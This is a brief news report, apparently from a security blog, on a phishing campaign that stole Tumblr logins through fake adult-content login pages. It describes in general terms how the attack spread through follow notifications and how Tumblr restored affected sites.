Thousands of logins for emo-blogging platform Tumblr have been stolen in the past week via a phishing attack that lured users to enter their credentials in exchange for the promise of erotic content.
Compromised Tumblr sites were converted into pages that copied how a Tumblr login screen looks, with the addition of “This page contains adult content. Please revalidate your credentials.” If you entered your Tumblr login, then your page would get converted into another fake login screen and the cycle would continue.
The phish attack then spread by having that Tumblr user “follow” several other new Tumblr users. When those people then got notified that they had new followers, they would click on those people’s names in their dashboard to see who they were. That’s when the fake login would pop up.
Once you get past the initial surprise, the question is, what would anyone want to do with a bunch of Tumblr usernames and passwords? The service is free so you’re not going to be getting anyone’s credit card, banking, or personal information. The attack could have been a precursor to setting up link farm, or maybe the perpetrator simply wanted a proof of concept of how gullible Tumblr users were.
Tumblr has been restoring the sites of those users who were compromised and says they are on the case of tracking down the source of the attack.
Here are various Tumblr posts from users about the attack: http://www.tumblr.com/tagged/adult+content
Thousands of Tumblr Logins Stolen in Phishing Attack [GFI Labs Blog]